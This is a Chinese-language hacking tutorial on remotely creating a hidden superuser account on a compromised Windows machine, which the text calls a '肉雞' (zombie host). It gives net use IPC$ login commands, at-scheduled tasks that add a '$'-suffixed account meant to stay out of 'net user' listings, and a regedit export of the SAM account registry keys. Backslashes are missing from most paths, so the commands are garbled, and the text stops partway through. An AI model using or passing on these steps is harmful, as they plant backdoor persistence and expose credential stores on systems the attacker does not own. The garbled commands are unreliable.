超級用戶是一個負責管理和維護網絡的用戶。這個術語在NetWare網上有特殊的含義。超級用戶對所有的文件卷宗、目錄和文件有完全的訪問權,它是安裝後第一個登錄到服務器上的用戶。然後超級用戶立即改變口令,於是沒有其它用戶能夠訪問服務器和獲得超級用戶無限的訪問權。那麼在系統中如何隱藏超級用戶呢?下文中就為大家列舉系統中多種隱藏超級用戶方法.
一、如何在命令行下遠程建立隱藏的超級用戶
在這裡將用at的命令,因為用at產生的計劃任務是以系統身份運行的,所以也用不到psu.exe程序。為了能夠使用at命令,肉雞必須開有schedule的服務,如果沒有開啟,可用流光裡帶的工具netsvc.exe或sc.exe來遠程啟動,當然其方法也可以,只要能啟動schedule服務就行。
對於命令行方式,你可以采用各種連接方式,如用SQLexec連接MSSQL的1433端口,也可以用telnet服務,只要以你能得到一個cmdshell,並且有運行at命令的權限就可以。
1、首先找到一台肉雞,至於如何來找那不是我這裡所說的話題。這裡先假設找到一台超級用戶為administrator,密碼為12345678的肉雞,現在我們開始在命令行下遠程為它建立隱藏的超級用戶。(例子中的主機是我的局域網內的一台主機,我將它的ip地址改為13.50.97.238,,請勿在互聯網上對號入座,以免騷擾正常的ip地址。)
2、先與肉雞建立連接,命令為:net use 13.50.97.238ipc$ "12345678" /user:"administrator
3、用at命令在肉雞上建立一個用戶(如果at服務沒有啟動,可用小榕的netsvc.exe或sc.exe來遠程啟動):
at 13.50.97.238 12:51 c:\winntsystem32net.exe user hacker$ 1234 /add
建立這個加有$符的用戶名,是因為加有$符後,命令行下用net user將不顯示這個用戶,但在帳戶管理器卻能看到這個用戶。
4、同樣用at命令導出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下鍵值:
at 13.50.97.238 12:55 c:\winntregedit.exe /e hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e 是regedit.exe的參數,在_LOCAL_MACHINESAMSAMDomainsaccountusers這個鍵的一定要以結尾。必要的情況下可以用引號將“c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起來。